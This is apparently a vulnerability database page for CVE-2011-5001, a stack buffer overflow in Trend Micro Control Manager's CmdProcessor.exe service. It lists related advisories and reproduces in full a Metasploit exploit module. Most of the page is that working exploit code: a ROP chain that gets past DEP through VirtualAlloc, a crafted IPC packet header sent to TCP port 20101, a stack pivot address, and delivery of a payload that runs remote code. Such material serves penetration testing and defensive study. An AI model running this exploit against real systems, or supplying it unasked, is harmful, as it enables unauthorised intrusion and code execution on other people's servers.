TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow

🗓️ 23 Feb 2012 01:44:47Reported by Luigi Auriemma, BlueType

TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow. Vulnerability in CmdProcessor.exe component of Trend Micro Control Manger up to version 5.5. Allows remote code execution under user context

Reporter	Title	Published	Views	Family All 17
0day.today	TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack BOF	24 Feb 201200:00	–	zdt
Circl	CVE-2011-5001	23 Feb 201200:00	–	circl
Check Point Advisories	Trend Micro Control Manager CmdProcessor.exe AddTask Stack Buffer Overflow (CVE-2011-5001)	16 Apr 201200:00	–	checkpoint_advisories
CVE	CVE-2011-5001	25 Dec 201101:00	–	cve
Cvelist	CVE-2011-5001	25 Dec 201101:00	–	cvelist
Exploit DB	Trend Micro Control Manger 5.5 - 'CmdProcessor.exe' Remote Stack Buffer Overflow (Metasploit)	23 Feb 201200:00	–	exploitdb
NVD	CVE-2011-5001	25 Dec 201101:55	–	nvd
OpenVAS	Trend Micro Control Manager 'CmdProcessor.exe' Buffer Overflow Vulnerability	2 Jul 201200:00	–	openvas
Packet Storm	TrendMicro Control Manager 5.5 Buffer Overflow	24 Feb 201200:00	–	packetstorm
Prion	Stack overflow	25 Dec 201101:55	–	prion

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info={})
    super(update_info(info,
      'Name'           => "TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability in the CmdProcessor.exe component of Trend
        Micro Control Manger up to version 5.5.

          The specific flaw exists within CmdProcessor.exe service running on TCP port
        20101. The vulnerable function is the CGenericScheduler::AddTask function of
        cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,
        controlled data is copied into a 256-byte stack buffer. This can be exploited
        to execute remote code under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma',  #Initial discovery
          'Blue',            #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2011-5001'],
          ['OSVDB', '77585'],
          ['ZDI', '11-345']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            # TCM 5.5 cannot be installed in Win2k3 SP0-SP1, Win2k8, or XP
            'Windows 2003 Server SP2 (DEP Bypass)',
            {
              'Ret'    => 0x666b34c8, # TMNotify.dll stack pivot
              'Offset' => 5000
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-12-07',
      'DefaultTarget'  => 0))

      register_options(
      [
        Opt::RPORT(20101)
      ])
  end

  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  def exploit

    #TmUpdate.dll
    rop_chain = [
      0x668074d4,	# POP EDX # OR AL,0F6 # RETN
      0x3FCD0FFC,	# Put 00001000 into edx
      0x667611b2,	# ADD EDX,C0330004 # RETN 04
      0x667c99e7,	# POP EBP # RETN [TmUpdate.dll]
      junk,
      0x667c99e7,	# skip 4 bytes [TmUpdate.dll]
      0x667e3250,	# POP EBX # RETN [TmUpdate.dll]
      0xffffffff,	# NEG EBX
      0x6683ab64,	# INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
      0x6683ab64,	# INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
      0x6680a1d3,	# POP EAX # RETN [TmUpdate.dll]
      0xffffffc0,	# Value to negate, will become 0x00000040
      0x66812b53,	# NEG EAX # RETN [TmUpdate.dll]
      0x667f030a,	# MOV ECX,EAX # RETN [TmUpdate.dll]
      0x667d4c7c,	# POP EDI # RETN [TmUpdate.dll]
      0x667e8003,	# RETN (ROP NOP) [TmUpdate.dll]
      0x667d54d0,	# POP ESI # RETN [TmUpdate.dll]
      0x667baf06,	# JMP [EAX] [TmUpdate.dll]
      0x66833376,	# POP EAX # RETN [TmUpdate.dll]
      0x6686115c,	# ptr to &VirtualAlloc() [IAT TmUpdate.dll]
      0x6681ceb3,	# PUSHAD # RETN [TmUpdate.dll]
      0x668382c3,	# ptr to 'call esp' [TmUpdate.dll]
    ].pack('V*')
    #rop chain generated by mona.py

    header  = "\x00\x00"
    header << "\x13\x88"          #size of buffer
    header << rand_text_alpha(9)
    header << "\x15\x09\x13"      #opcode
    header << "\x00\x00\x00"
    header << rand_text_alpha(25)
    header << "\xFE\xFF\xFF\xFF"  #in instruction #MOV EDI,DWORD PTR DS:[EAX+ECX] #ECX is our buffer and needs to be readable dword
    header << "\xFF\xFF\xFF\xFF"  #after sum with EAX. Pointer from EAX increments by #LEA EAX,DWORD PTR DS:[EAX+EDI+4] and then is saved
    header << "\xFF\xFF\xF4\xFF"  #and used again. We can essentially walk the loop which increments EBX by 1 until we get to 14 which leads
    header << "\xFF\xFF"          #us to our vulnerable function
    header << rand_text_alpha(1)  #align stack again for rop

    pay = rop_chain
    pay << make_nops(374 - rop_chain.length)
    pay << "\xeb\x04"  #Short jmp 0x04
    pay << [target.ret].pack('V')
    pay << payload.encoded

    sploit = header
    sploit << pay

    filler = rand_text_alpha(target['Offset'] - (sploit.length))

    connect
    print_status("Sending request...")
    sock.put(sploit + filler)
    handler
    disconnect

  end
end

02 Oct 2020 20:00Current

7.5High risk

Vulners AI Score7.5

CVSS 210

EPSS0.72